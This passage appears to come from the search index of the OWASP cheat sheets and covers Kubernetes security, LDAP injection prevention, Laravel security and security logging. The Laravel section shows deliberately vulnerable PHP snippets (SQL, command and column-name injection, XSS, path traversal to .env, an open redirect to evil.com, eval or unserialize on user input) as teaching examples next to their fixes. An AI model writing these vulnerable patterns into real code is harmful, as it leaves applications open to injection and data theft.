kubectl get events -n <namespace>\n\nNAMESPACE LAST SEEN TYPE   REASON OBJECT MESSAGE\nkube-system  8m22s  Normal   Scheduled            pod/metrics-server-66dbbb67db-lh865                                       Successfully assigned kube-system/metrics-server-66dbbb67db-lh865 to aks-agentpool-42213468-1\nkube-system     8m14s               Normal    Pulling                   pod/metrics-server-66dbbb67db-lh865                                       Pulling image \"aksrepos.azurecr.io/mirror/metrics-server-amd64:v0.2.1\"\nkube-system     7m58s               Normal    Pulled                    pod/metrics-server-66dbbb67db-lh865                                       Successfully pulled image \"aksrepos.azurecr.io/mirror/metrics-server-amd64:v0.2.1\"\nkube-system     7m57s               Normal     Created                   pod/metrics-server-66dbbb67db-lh865                                       Created container metrics-server\nkube-system     7m57s               Normal    Started                   pod/metrics-server-66dbbb67db-lh865                                       Started container metrics-server\nkube-system     8m23s               Normal    SuccessfulCreate          replicaset/metrics-server-66dbbb67db             Created pod: metrics-server-66dbbb67db-lh865\n

The following command will show the latest events for this specific Kubernetes resource:

kubectl describe pod <pod-name>\n\nEvents:\n  Type    Reason     Age   From                               Message\n  ----    ------     ----  ----                               -------\n  Normal  Scheduled  14m   default-scheduler                  Successfully assigned kube-system/coredns-7b54b5b97c-dpll7 to aks-agentpool-42213468-1\n  Normal  Pulled     13m   kubelet, aks-agentpool-42213468-1  Container image \"aksrepos.azurecr.io/mirror/coredns:1.3.1\" already present on machine\n  Normal  Created    13m   kubelet, aks-agentpool-42213468-1  Created container coredns\n  Normal  Started    13m   kubelet, aks-agentpool-42213468-1  Started container coredns\n
"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#final-thoughts","title":"Final thoughts","text":""},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#embed-security-earlier-into-the-container-lifecycle","title":"Embed security earlier into the container lifecycle","text":"

You must integrate security earlier into the container lifecycle and ensure alignment and shared goals between security and DevOps teams. Security can (and should) be an enabler that allows your developers and DevOps teams to confidently build and deploy applications that are production-ready for scale, stability and security.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#use-kubernetes-native-security-controls-to-reduce-operational-risk","title":"Use Kubernetes-native security controls to reduce operational risk","text":"

Leverage the native controls built into Kubernetes whenever available in order to enforce security policies so that your security controls don\u2019t collide with the orchestrator. Instead of using a third-party proxy or shim to enforce network segmentation, as an example, use Kubernetes network policies to ensure secure network communication.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#leverage-the-context-that-kubernetes-provides-to-prioritize-remediation-efforts","title":"Leverage the context that Kubernetes provides to prioritize remediation efforts","text":"

In sprawling Kubernetes environments, manually triaging security incidents and policy violations is time consuming.

For example, a deployment containing a vulnerability with severity score of 7 or greater should be moved up in remediation priority if that deployment contains privileged containers and is open to the Internet but moved down if it\u2019s in a test environment and supporting a non-critical app.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#references","title":"References","text":"

Master documentation - https://kubernetes.io

  1. Kubernetes Security Best Practices everyone must follow - https://www.cncf.io/blog/2019/01/14/9-kubernetes-security-best-practices-everyone-must-follow
  2. Securing a Cluster - https://kubernetes.io/blog/2016/08/security-best-practices-kubernetes-deployment
  3. Security Best Practices for Kubernetes Deployment - https://kubernetes.io/docs/tasks/administer-cluster/securing-a-cluster
  4. Kubernetes Security Best Practices - https://phoenixnap.com/kb/kubernetes-security-best-practices
  5. Kubernetes Security 101: Risks and 29 Best Practices - https://www.stackrox.com/post/2020/05/kubernetes-security-101
  6. 15 Kubernetes security best practice to secure your cluster - https://www.mobilise.cloud/15-kubernetes-security-best-practice-to-secure-your-cluster
  7. The Ultimate Guide to Kubernetes Security - https://neuvector.com/container-security/kubernetes-security-guide
  8. A hacker's guide to Kubernetes security - https://techbeacon.com/enterprise-it/hackers-guide-kubernetes-security
  9. 11 Ways (Not) to Get Hacked - https://kubernetes.io/blog/2018/07/18/11-ways-not-to-get-hacked
  10. 12 Kubernetes configuration best practices - https://www.stackrox.com/post/2019/09/12-kubernetes-configuration-best-practices/#6-securely-configure-the-kubernetes-api-server
  11. A Practical Guide to Kubernetes Logging - https://logz.io/blog/a-practical-guide-to-kubernetes-logging
  12. Kubernetes Web UI (Dashboard) - https://kubernetes.io/docs/tasks/access-application-cluster/web-ui-dashboard
  13. Tesla cloud resources are hacked to run cryptocurrency-mining malware - https://arstechnica.com/information-technology/2018/02/tesla-cloud-resources-are-hacked-to-run-cryptocurrency-mining-malware
  14. OPEN POLICY AGENT: CLOUD-NATIVE AUTHORIZATION - https://blog.styra.com/blog/open-policy-agent-authorization-for-the-cloud
  15. Introducing Policy As Code: The Open Policy Agent (OPA) - https://www.magalix.com/blog/introducing-policy-as-code-the-open-policy-agent-opa
  16. What service mesh provides - https://aspenmesh.io/wp-content/uploads/2019/10/AspenMesh_CompleteGuide.pdf
  17. Three Technical Benefits of Service Meshes and their Operational Limitations, Part 1 - https://glasnostic.com/blog/service-mesh-istio-limits-and-benefits-part-1
  18. Open Policy Agent: What Is OPA and How It Works (Examples) - https://spacelift.io/blog/what-is-open-policy-agent-and-how-it-works
  19. Send Kubernetes Metrics To Kibana and Elasticsearch - https://logit.io/sources/configure/kubernetes/
  20. Kubernetes Security Checklist - https://kubernetes.io/docs/concepts/security/security-checklist/
"},{"location":"cheatsheets/LDAP_Injection_Prevention_Cheat_Sheet.html","title":"LDAP Injection Prevention Cheat Sheet","text":""},{"location":"cheatsheets/LDAP_Injection_Prevention_Cheat_Sheet.html#introduction","title":"Introduction","text":"

This cheatsheet is focused on providing clear, simple, actionable guidance for preventing LDAP Injection flaws in your applications.

LDAP Injection is an attack used to exploit web based applications that construct LDAP statements based on user input. When an application fails to properly sanitize user input, it's possible to modify LDAP statements through techniques similar to SQL Injection.

LDAP injection attacks could result in the granting of permissions to unauthorized queries, and content modification inside the LDAP tree.

For more information on LDAP Injection attacks, visit LDAP injection.

LDAP injection attacks are common due to two factors:

  1. The lack of safer, parameterized LDAP query interfaces
  2. The widespread use of LDAP to authenticate users to systems.

Primary Defenses:

Additional Defenses:

"},{"location":"cheatsheets/LDAP_Injection_Prevention_Cheat_Sheet.html#primary-defenses","title":"Primary Defenses","text":""},{"location":"cheatsheets/LDAP_Injection_Prevention_Cheat_Sheet.html#defense-option-1-escape-all-variables-using-the-right-ldap-encoding-function","title":"Defense Option 1: Escape all variables using the right LDAP encoding function","text":""},{"location":"cheatsheets/LDAP_Injection_Prevention_Cheat_Sheet.html#distinguished-name-escaping","title":"Distinguished Name Escaping","text":"

The main way LDAP stores names is based on DN (distinguished name). You can think of this like a unique identifier. These are sometimes used to access resources, like a username.

A DN might look like this

cn=Richard\u00a0Feynman,\u00a0ou=Physics\u00a0Department,\u00a0dc=Caltech,\u00a0dc=edu

or

uid=inewton,\u00a0ou=Mathematics\u00a0Department,\u00a0dc=Cambridge,\u00a0dc=com

There are certain characters that are considered special characters in a DN.

The exhaustive list is the following: \\ # + < > , ; \" = and leading or trailing spaces.

Some \"special\" characters that are allowed in Distinguished Names and do not need to be escaped include:

* ( ) . & - _ [ ] ` ~ | @ $ % ^ ? : { } ! '\n
"},{"location":"cheatsheets/LDAP_Injection_Prevention_Cheat_Sheet.html#search-filter-escaping","title":"Search Filter Escaping","text":"

Each DN points to exactly 1 entry, which can be thought of sort of like a row in a RDBMS. For each entry, there will be 1 or more attributes which are analogous to RDBMS columns. If you are interested in searching through LDAP for users will certain attributes, you may do so with search filters.

In a search filter, you can use standard boolean logic to get a list of users matching an arbitrary constraint. Search filters are written in Polish notation AKA prefix notation.

Example:

(&(ou=Physics)(|\n(manager=cn=Freeman\u00a0Dyson,ou=Physics,dc=Caltech,dc=edu)\n(manager=cn=Albert\u00a0Einstein,ou=Physics,dc=Princeton,dc=edu)\n))\n

When building LDAP queries in application code, you MUST escape any untrusted data that is added to any LDAP query. There are two forms of LDAP escaping. Encoding for LDAP Search and Encoding for LDAP DN (distinguished name). The proper escaping depends on whether you are sanitizing input for a search filter, or you are using a DN as a username-like credential for accessing some resource.

Some \"special\" characters that are allowed in search filters and must be escaped include:

* ( ) \\ NUL\n

For more information on search filter escaping visit RFC4515.

"},{"location":"cheatsheets/LDAP_Injection_Prevention_Cheat_Sheet.html#safe-java-escaping-example","title":"Safe Java Escaping Example","text":""},{"location":"cheatsheets/LDAP_Injection_Prevention_Cheat_Sheet.html#safe-c-sharp-net-tba-example","title":"Safe C Sharp .NET TBA Example","text":"

.NET AntiXSS (now the Encoder class) has LDAP encoding functions including Encoder.LdapFilterEncode(string), Encoder.LdapDistinguishedNameEncode(string) and Encoder.LdapDistinguishedNameEncode(string, bool, bool).

Encoder.LdapFilterEncode encodes input according to RFC4515 where unsafe values are converted to \\XX where XX is the representation of the unsafe character.

Encoder.LdapDistinguishedNameEncode encodes input according to RFC2253 where unsafe characters are converted to #XX where XX is the representation of the unsafe character and the comma, plus, quote, slash, less than and great than signs are escaped using slash notation (\\X). In addition to this a space or octothorpe (#) at the beginning of the input string is \\ escaped as is a space at the end of a string.

LdapDistinguishedNameEncode(string, bool, bool) is also provided so you may turn off the initial or final character escaping rules, for example if you are concatenating the escaped distinguished name fragment into the midst of a complete distinguished name.

"},{"location":"cheatsheets/LDAP_Injection_Prevention_Cheat_Sheet.html#defense-option-2-use-frameworks-that-automatically-protect-from-ldap-injection","title":"Defense Option 2: Use Frameworks that Automatically Protect from LDAP Injection","text":"

Safe NET Example

LINQ to Active Directory provides automatic LDAP encoding when building LDAP queries.

"},{"location":"cheatsheets/LDAP_Injection_Prevention_Cheat_Sheet.html#defense-option-3-additional-defenses","title":"Defense Option 3: Additional Defenses","text":"

Beyond adopting one of the two primary defenses, we also recommend adopting all of these additional defenses in order to provide defense in depth. These additional defenses are:

"},{"location":"cheatsheets/LDAP_Injection_Prevention_Cheat_Sheet.html#least-privilege","title":"Least Privilege","text":"

To minimize the potential damage of a successful LDAP injection attack, you should minimize the privileges assigned to the LDAP binding account in your environment.

"},{"location":"cheatsheets/LDAP_Injection_Prevention_Cheat_Sheet.html#enabling-bind-authentication","title":"Enabling Bind Authentication","text":"

If LDAP protocol is configured with bind Authentication, attackers would not be able to perform LDAP injection attacks because of verification and authorization checks that are performed against valid credentials passed by the user. An attacker can still bypass bind authentication through an anonymous connection or by exploiting the use of unauthenticated bind: Anonymous Bind (LDAP) and Unauthenticated Bind (LDAP).

"},{"location":"cheatsheets/LDAP_Injection_Prevention_Cheat_Sheet.html#allow-list-input-validation","title":"Allow-List Input Validation","text":"

Input validation can be used to detect unauthorized input before it is passed to the LDAP query. For more information please see the Input Validation Cheat Sheet.

"},{"location":"cheatsheets/LDAP_Injection_Prevention_Cheat_Sheet.html#related-articles","title":"Related Articles","text":""},{"location":"cheatsheets/Laravel_Cheat_Sheet.html","title":"Laravel Cheat Sheet","text":""},{"location":"cheatsheets/Laravel_Cheat_Sheet.html#introduction","title":"Introduction","text":"

This Cheatsheet intends to provide security tips to developers building Laravel applications. It aims to cover all common vulnerabilities and how to ensure that your Laravel applications are secure.

The Laravel Framework provides in-built security features and is meant to be secure by default. However, it also provides additional flexibility for complex use cases. This means that developers unfamiliar with the inner workings of Laravel may fall into the trap of using complex features in a way that is not secure. This guide is meant to educate developers to avoid common pitfalls and develop Laravel applications in a secure manner.

You may also refer the Enlightn Security Documentation, which highlights common vulnerabilities and good practices on securing Laravel applications.

"},{"location":"cheatsheets/Laravel_Cheat_Sheet.html#the-basics","title":"The Basics","text":"
APP_DEBUG=false\n
php artisan key:generate\n
"},{"location":"cheatsheets/Laravel_Cheat_Sheet.html#cookie-security-and-session-management","title":"Cookie Security and Session Management","text":"

By default, Laravel is configured in a secure manner. However, if you change your cookie or session configurations, make sure of the following:

/**\n * The application's route middleware groups.\n *\n * @var array\n */\nprotected $middlewareGroups = [\n    'web' => [\n        \\App\\Http\\Middleware\\EncryptCookies::class,\n        ...\n    ],\n    ...\n];\n
'http_only' => true,\n
'domain' => null,\n
'same_site' => 'lax',\n
'secure' => null,\n
'lifetime' => 15,\n

You may also refer the Cookie Security Guide to learn more about cookie security and the cookie attributes mentioned above.

"},{"location":"cheatsheets/Laravel_Cheat_Sheet.html#authentication","title":"Authentication","text":""},{"location":"cheatsheets/Laravel_Cheat_Sheet.html#guards-and-providers","title":"Guards and Providers","text":"

At its core, Laravel's authentication facilities are made up of \"guards\" and \"providers\". Guards define how users are authenticated for each request. Providers define how users are retrieved from your persistent storage.

Laravel ships with a session guard which maintains state using session storage and cookies, and a token guard for API tokens.

For providers, Laravel ships with a eloquent provider for retrieving users using the Eloquent ORM and the database provider for retrieving users using the database query builder.

Guards and providers can be configured in the config/auth.php file. Laravel offers the ability to build custom guards and providers as well.

"},{"location":"cheatsheets/Laravel_Cheat_Sheet.html#starter-kits","title":"Starter Kits","text":"

Laravel offers a wide variety of first party application starter kits that include in-built authentication features:

  1. Laravel Breeze: A simple, minimal implementation of all Laravel's authentication features including login, registration, password reset, email verification and password confirmation.
  2. Laravel Fortify: A headless authentication backend that includes the above authentication features along with two-factor authentication.
  3. Laravel Jetstream: An application starter kit that provides a UI on top of Laravel Fortify's authentication features.

It is recommended to use one of these starter kits to ensure robust and secure authentication for your Laravel applications.

"},{"location":"cheatsheets/Laravel_Cheat_Sheet.html#api-authentication-packages","title":"API Authentication Packages","text":"

Laravel also offers the following API authentication packages:

  1. Passport: An OAuth2 authentication provider.
  2. Sanctum: An API token authentication provider.

Starter kits such as Fortify and Jetstream have in-built support for Sanctum.

"},{"location":"cheatsheets/Laravel_Cheat_Sheet.html#mass-assignment","title":"Mass Assignment","text":"

Mass assignment is a common vulnerability in modern web applications that use an ORM like Laravel's Eloquent ORM.

A mass assignment is a vulnerability where an ORM pattern is abused to modify data items that the user should not be normally allowed to modify.

Consider the following code:

Route::any('/profile', function (Request $request) {\n    $request->user()->forceFill($request->all())->save();\n\n    $user = $request->user()->fresh();\n\n    return response()->json(compact('user'));\n})->middleware('auth');\n

The above profile route allows the logged in user to change their profile information.

However, let's say there is an is_admin column in the users table. You probably do not want the user to be allowed to change the value of this column. However, the above code allows users to change any column values for their row in the users table. This is a mass assignment vulnerability.

Laravel has in-built features by default to protect against this vulnerability. Make sure of the following to stay secure:

"},{"location":"cheatsheets/Laravel_Cheat_Sheet.html#sql-injection","title":"SQL Injection","text":"

SQL Injection attacks are unfortunately quite common in modern web applications and entail attackers providing malicious request input data to interfere with SQL queries. This guide covers SQL injection and how it can be prevented specifically for Laravel applications. You may also refer the SQL Injection Prevention Cheatsheet for more information that is not specific to Laravel.

"},{"location":"cheatsheets/Laravel_Cheat_Sheet.html#eloquent-orm-sql-injection-protection","title":"Eloquent ORM SQL Injection Protection","text":"

By default, Laravel's Eloquent ORM protects against SQL injection by parameterizing queries and using SQL bindings. For instance, consider the following query:

use App\\Models\\User;\n\nUser::where('email', $email)->get();\n

The code above fires the query below:

select * from `users` where `email` = ?\n

So, even if $email is untrusted user input data, you are protected from SQL injection attacks.

"},{"location":"cheatsheets/Laravel_Cheat_Sheet.html#raw-query-sql-injection","title":"Raw Query SQL Injection","text":"

Laravel also offers raw query expressions and raw queries to construct complex queries or database specific queries that aren't supported out of the box.

While this is great for flexibility, you must be careful to always use SQL data bindings for such queries. Consider the following query:

use Illuminate\\Support\\Facades\\DB;\nuse App\\Models\\User;\n\nUser::whereRaw('email = \"'.$request->input('email').'\"')->get();\nDB::table('users')->whereRaw('email = \"'.$request->input('email').'\"')->get();\n

Both lines of code actually execute the same query, which is vulnerable to SQL injection as the query does not use SQL bindings for untrusted user input data.

The code above fires the following query:

select * from `users` where `email` = \"value of email query parameter\"\n

Always remember to use SQL bindings for request data. We can fix the above code by making the following modification:

use App\\Models\\User;\n\nUser::whereRaw('email = ?', [$request->input('email')])->get();\n

We can even use named SQL bindings like so:

use App\\Models\\User;\n\nUser::whereRaw('email = :email', ['email' => $request->input('email')])->get();\n
"},{"location":"cheatsheets/Laravel_Cheat_Sheet.html#column-name-sql-injection","title":"Column Name SQL Injection","text":"

You must never allow user input data to dictate column names referenced by your queries.

The following queries may be vulnerable to SQL injection:

use App\\Models\\User;\n\nUser::where($request->input('colname'), 'somedata')->get();\nUser::query()->orderBy($request->input('sortBy'))->get();\n

It is important to note that even though Laravel has some in-built features such as wrapping column names to protect against the above SQL injection vulnerabilities, some database engines (depending on versions and configurations) may still be vulnerable because binding column names is not supported by databases.

At the very least, this may result in a mass assignment vulnerability instead of a SQL injection because you may have expected a certain set of column values, but since they are not validated here, the user is free to use other columns as well.

Always validate user input for such situations like so:

use App\\Models\\User;\n\n$request->validate(['sortBy' => 'in:price,updated_at']);\nUser::query()->orderBy($request->validated()['sortBy'])->get();\n
"},{"location":"cheatsheets/Laravel_Cheat_Sheet.html#validation-rule-sql-injection","title":"Validation Rule SQL Injection","text":"

Certain validation rules have the option of providing database column names. Such rules are vulnerable to SQL injection in the same manner as column name SQL injection because they construct queries in a similar manner.

For example, the following code may be vulnerable:

use Illuminate\\Validation\\Rule;\n\n$request->validate([\n    'id' => Rule::unique('users')->ignore($id, $request->input('colname'))\n]);\n

Behind the scenes, the above code triggers the following query:

use App\\Models\\User;\n\n$colname = $request->input('colname');\nUser::where($colname, $request->input('id'))->where($colname, '<>', $id)->count();\n

Since the column name is dictated by user input, it is similar to column name SQL injection.

"},{"location":"cheatsheets/Laravel_Cheat_Sheet.html#cross-site-scripting-xss","title":"Cross Site Scripting (XSS)","text":"

XSS attacks are injection attacks where malicious scripts (such as JavaScript code snippets) are injected into trusted websites.

Laravel's Blade templating engine has echo statements {{ }} that automatically escape variables using the htmlspecialchars PHP function to protect against XSS attacks.

Laravel also offers displaying unescaped data using the unescaped syntax {!! !!}. This must not be used on any untrusted data, otherwise your application will be subject to an XSS attack.

For instance, if you have something like this in any of your Blade templates, it would result in a vulnerability:

{!! request()->input('somedata') !!}\n

This, however, is safe to do:

{{ request()->input('somedata') }}\n

For other information on XSS prevention that is not specific to Laravel, you may refer the Cross Site Scripting Prevention Cheatsheet.

"},{"location":"cheatsheets/Laravel_Cheat_Sheet.html#unrestricted-file-uploads","title":"Unrestricted File Uploads","text":"

Unrestricted file upload attacks entail attackers uploading malicious files to compromise web applications. This section describes how to protect against such attacks while building Laravel applications. You may also refer the File Upload Cheatsheet to learn more.

"},{"location":"cheatsheets/Laravel_Cheat_Sheet.html#always-validate-file-type-and-size","title":"Always Validate File Type and Size","text":"

Always validate the file type (extension or MIME type) and file size to avoid storage DOS attacks and remote code execution:

$request->validate([\n    'photo' => 'file|size:100|mimes:jpg,bmp,png'\n]);\n

Storage DOS attacks exploit missing file size validations and upload massive files to cause a denial of service (DOS) by exhausting the disk space.

Remote code execution attacks entail first, uploading malicious executable files (such as PHP files) and then, triggering their malicious code by visiting the file URL (if public).

Both these attacks can be avoided by simple file validations as mentioned above.

"},{"location":"cheatsheets/Laravel_Cheat_Sheet.html#do-not-rely-on-user-input-to-dictate-filenames-or-path","title":"Do Not Rely On User Input To Dictate Filenames or Path","text":"

If your application allows user controlled data to construct the path of a file upload, this may result in overwriting a critical file or storing the file in a bad location.

Consider the following code:

Route::post('/upload', function (Request $request) {\n    $request->file('file')->storeAs(auth()->id(), $request->input('filename'));\n\n    return back();\n});\n

This route saves a file to a directory specific to a user ID. Here, we rely on the filename user input data and this may result in a vulnerability as the filename could be something like ../2/filename.pdf. This will upload the file in user ID 2's directory instead of the directory pertaining to the current logged in user.

To fix this, we should use the basename PHP function to strip out any directory information from the filename input data:

Route::post('/upload', function (Request $request) {\n    $request->file('file')->storeAs(auth()->id(), basename($request->input('filename')));\n\n    return back();\n});\n
"},{"location":"cheatsheets/Laravel_Cheat_Sheet.html#avoid-processing-zip-or-xml-files-if-possible","title":"Avoid Processing ZIP or XML Files If Possible","text":"

XML files can expose your application to a wide variety of attacks such as XXE attacks, the billion laughs attack and others. If you process ZIP files, you may be exposed to zip bomb DOS attacks.

Refer the XML Security Cheatsheet and the File Upload Cheatsheet to learn more.

"},{"location":"cheatsheets/Laravel_Cheat_Sheet.html#path-traversal","title":"Path Traversal","text":"

A path traversal attack aims to access files by manipulating request input data with ../ sequences and variations or by using absolute file paths.

If you allow users to download files by filename, you may be exposed to this vulnerability if input data is not stripped of directory information.

Consider the following code:

Route::get('/download', function(Request $request) {\n    return response()->download(storage_path('content/').$request->input('filename'));\n});\n

Here, the filename is not stripped of directory information, so a malformed filename such as ../../.env could expose your application credentials to potential attackers.

Similar to unrestricted file uploads, you should use the basename PHP function to strip out directory information like so:

Route::get('/download', function(Request $request) {\n    return response()->download(storage_path('content/').basename($request->input('filename')));\n});\n
"},{"location":"cheatsheets/Laravel_Cheat_Sheet.html#open-redirection","title":"Open Redirection","text":"

Open Redirection attacks in themselves are not that dangerous but they enable phishing attacks.

Consider the following code:

Route::get('/redirect', function (Request $request) {\n   return redirect($request->input('url'));\n});\n

This code redirects the user to any external URL provided by user input. This could enable attackers to create seemingly safe URLs like https://example.com/redirect?url=http://evil.com. For instance, attackers may use a URL of this type to spoof password reset emails and lead victims to expose their credentials on the attacker's website.

"},{"location":"cheatsheets/Laravel_Cheat_Sheet.html#cross-site-request-forgery-csrf","title":"Cross Site Request Forgery (CSRF)","text":"

Cross-Site Request Forgery (CSRF)\u00a0is a type of attack that occurs when a malicious web site, email, blog, instant message, or program causes a user's web browser to perform an unwanted action on a trusted site when the user is authenticated.

Laravel provides CSRF protection out-of-the-box with the VerifyCSRFToken middleware. Generally, if you have this middleware in the web middleware group of your App\\Http\\Kernel class, you should be well protected:

/**\n * The application's route middleware groups.\n *\n * @var array\n */\nprotected $middlewareGroups = [\n    'web' => [\n        ...\n         \\App\\Http\\Middleware\\VerifyCsrfToken::class,\n         ...\n    ],\n];\n

Next, for all your POST request forms, you may use the @csrf blade directive to generate the hidden CSRF input token fields:

<form method=\"POST\" action=\"/profile\">\n    @csrf\n\n    <!-- Equivalent to... -->\n    <input type=\"hidden\" name=\"_token\" value=\"{{ csrf_token() }}\" />\n</form>\n

For AJAX requests, you can setup the X-CSRF-Token header.

Laravel also provides the ability to exclude certain routes from CSRF protection using the $except variable in your CSRF middleware class. Typically, you would want to exclude only stateless routes (e.g. APIs or webhooks) from CSRF protection. If any other routes are excluded, these may result in CSRF vulnerabilities.

"},{"location":"cheatsheets/Laravel_Cheat_Sheet.html#command-injection","title":"Command Injection","text":"

Command Injection vulnerabilities involve executing shell commands constructed with unescaped user input data.

For example, the following code performs a whois on a user provided domain name:

public function verifyDomain(Request $request)\n{\n    exec('whois '.$request->input('domain'));\n}\n

The above code is vulnerable as the user data is not escaped properly. To do so, you may use the escapeshellcmd and/or escapeshellarg PHP functions.

"},{"location":"cheatsheets/Laravel_Cheat_Sheet.html#other-injections","title":"Other Injections","text":"

Object injection, eval code injection and extract variable hijacking attacks involve unserializing, evaluating or using the extract function on untrusted user input data.

Some examples are:

unserialize($request->input('data'));\neval($request->input('data'));\nextract($request->all());\n

In general, avoid passing any untrusted input data to these dangerous functions.

"},{"location":"cheatsheets/Laravel_Cheat_Sheet.html#security-headers","title":"Security Headers","text":"

You should consider adding the following security headers to your web server or Laravel application middleware:

For more information, refer the OWASP secure headers project.

"},{"location":"cheatsheets/Laravel_Cheat_Sheet.html#tools","title":"Tools","text":"

You should consider using Enlightn, a static and dynamic analysis tool for Laravel applications that has over 45 automated security checks to identify potential security issues. There is both an open source version and a commercial version of Enlightn available. Enlightn includes an extensive 45 page documentation on security vulnerabilities and a great way to learn more on Laravel security is to just review its documentation.

You should also use the Enlightn Security Checker or the Local PHP Security Checker. Both of them are open source packages, licensed under the MIT and AGPL licenses respectively, that scan your PHP dependencies for known vulnerabilities using the Security Advisories Database.

"},{"location":"cheatsheets/Laravel_Cheat_Sheet.html#references","title":"References","text":""},{"location":"cheatsheets/Logging_Cheat_Sheet.html","title":"Logging Cheat Sheet","text":""},{"location":"cheatsheets/Logging_Cheat_Sheet.html#introduction","title":"Introduction","text":"

This cheat sheet is focused on providing developers with concentrated guidance on building application logging mechanisms, especially related to security logging.

Many systems enable network device, operating system, web server, mail server and database server logging, but often custom application event logging is missing, disabled or poorly configured. It provides much greater insight than infrastructure logging alone. Web application (e.g. web site or web service) logging is much more than having web server logs enabled (e.g. using Extended Log File Format).

Application logging should be consistent within the application, consistent across an organization's application portfolio and use industry standards where relevant, so the logged event data can be consumed, correlated, analyzed and managed by a wide variety of systems.

"},{"location":"cheatsheets/Logging_Cheat_Sheet.html#purpose","title":"Purpose","text":"

Application logging should always be included for security events. Application logs are invaluable data for:

Application logging might also be used to record other types of events too such as:

Process monitoring, audit and transaction logs/trails etc are usually collected for different purposes than security event logging, and this often means they should be kept separate.

The types of events and details collected will tend to be different.

For example a PCIDSS audit log will contain a chronological record of activities to provide an independently verifiable trail that permits reconstruction, review and examination to determine the original sequence of attributable transactions. It is important not to log too much, or too little.

Use knowledge of the intended purposes to guide what, when and how much. The remainder of this cheat sheet primarily discusses security event logging.

"},{"location":"cheatsheets/Logging_Cheat_Sheet.html#design-implementation-and-testing","title":"Design, implementation and testing","text":""},{"location":"cheatsheets/Logging_Cheat_Sheet.html#event-data-sources","title":"Event data sources","text":"

The application itself has access to a wide range of information events that should be used to generate log entries. Thus, the primary event data source is the application code itself.

The application has the most information about the user (e.g. identity, roles, permissions) and the context of the event (target, action, outcomes), and often this data is not available to either infrastructure devices, or even closely-related applications.

Other sources of information about application usage that could also be considered are:

The degree of confidence in the event information has to be considered when including event data from systems in a different trust zone. Data may be missing, modified, forged, replayed and could be malicious \u2013 it must always be treated as untrusted data.

Consider how the source can be verified, and how integrity and non-repudiation can be enforced.

"},{"location":"cheatsheets/Logging_Cheat_Sheet.html#where-to-record-event-data","title":"Where to record event data","text":"

Applications commonly write event log data to the file system or a database (SQL or NoSQL). Applications installed on desktops and on mobile devices may use local storage and local databases, as well as sending data to remote storage.

Your selected framework may limit the available choices. All types of applications may send event data to remote systems (instead of or as well as more local storage).

This could be a centralized log collection and management system (e.g. SIEM or SEM) or another application elsewhere. Consider whether the application can simply send its event stream, unbuffered, to stdout, for management by the execution environment.

Consider separate files/tables for extended event information such as error stack traces or a record of HTTP request and response headers and bodies.

"},{"location":"cheatsheets/Logging_Cheat_Sheet.html#which-events-to-log","title":"Which events to log","text":"

The level and content of security monitoring, alerting and reporting needs to be set during the requirements and design stage of projects, and should be proportionate to the information security risks. This can then be used to define what should be logged.

There is no one size fits all solution, and a blind checklist approach can lead to unnecessary \"alarm fog\" that means real problems go undetected.

Where possible, always log:

Optionally consider if the following events can be logged and whether it is desirable information:

"},{"location":"cheatsheets/Logging_Cheat_Sheet.html#event-attributes","title":"Event attributes","text":"

Each log entry needs to include sufficient information for the intended subsequent monitoring and analysis. It could be full content data, but is more likely to be an extract or just summary properties.

The application logs must record \"when, where, who and what\" for each event.

The properties for these will be different depending on the architecture, class of application and host system/device, but often include the following:

Additionally consider recording:

For more information on these, see the \"other\" related articles listed at the end, especially the comprehensive article by Anton Chuvakin and Gunnar Peterson.

Note A: The \"Interaction identifier\" is a method of linking all (relevant) events for a single user interaction (e.g. desktop application form submission, web page request, mobile app button click, web service call). The application knows all these events relate to the same interaction, and this should be recorded instead of losing the information and forcing subsequent correlation techniques to re-construct the separate events. For example a single SOAP request may have multiple input validation failures and they may span a small range of times. As another example, an output validation failure may occur much later than the input submission for a long-running \"saga request\" submitted by the application to a database server.

Note B: Each organisation should ensure it has a consistent, and documented, approach to classification of events (type, confidence, severity), the syntax of descriptions, and field lengths & data types including the format used for dates/times.

"},{"location":"cheatsheets/Logging_Cheat_Sheet.html#data-to-exclude","title":"Data to exclude","text":"

Never log data unless it is legally sanctioned. For example intercepting some communications, monitoring employees, and collecting some data without consent may all be illegal.

Never exclude any events from \"known\" users such as other internal systems, \"trusted\" third parties, search engine robots, uptime/process and other remote monitoring systems, pen testers, auditors. However, you may want to include a classification flag for each of these in the recorded data.

The following should usually not be recorded directly in the logs, but instead should be removed, masked, sanitized, hashed or encrypted:

Sometimes the following data can also exist, and whilst useful for subsequent investigation, it may also need to be treated in some special manner before the event is recorded:

Consider using personal data de-identification techniques such as deletion, scrambling or pseudonymization of direct and indirect identifiers where the individual's identity is not required, or the risk is considered too great.

In some systems, sanitization can be undertaken post log collection, and prior to log display.

"},{"location":"cheatsheets/Logging_Cheat_Sheet.html#customizable-logging","title":"Customizable logging","text":"

It may be desirable to be able to alter the level of logging (type of events based on severity or threat level, amount of detail recorded). If this is implemented, ensure that:

"},{"location":"cheatsheets/Logging_Cheat_Sheet.html#event-collection","title":"Event collection","text":"

If your development framework supports suitable logging mechanisms use, or build upon that. Otherwise, implement an application-wide log handler which can be called from other modules/components.

Document the interface referencing the organisation-specific event classification and description syntax requirements.

If possible create this log handler as a standard module that can be thoroughly tested, deployed in multiple applications, and added to a list of approved & recommended modules.

Note C: This is not always possible where the application is running on a device under some other party's control (e.g. on an individual's mobile phone, on a remote customer's workstation which is on another corporate network). In these cases attempt to measure the time offset, or record a confidence level in the event timestamp.

Where possible record data in a standard format, or at least ensure it can be exported/broadcast using an industry-standard format.

In some cases, events may be relayed or collected together in intermediate points. In the latter some data may be aggregated or summarized before forwarding on to a central repository and analysis system.

"},{"location":"cheatsheets/Logging_Cheat_Sheet.html#verification","title":"Verification","text":"

Logging functionality and systems must be included in code review, application testing and security verification processes:

"},{"location":"cheatsheets/Logging_Cheat_Sheet.html#network-architecture","title":"Network architecture","text":"

As an example, the diagram below shows a service that provides business functionality to customers. We recommend creating a centralized system for collecting logs. There may be many such services, but all of them must securely collect logs in a centralized system.

Applications of this business service are located in network segments:

The service responsible for collecting IT events, including security events, is located in the following segments:

For example, all external requests from users go through the API management service, see application in MIDDLEWARE 2 segment.

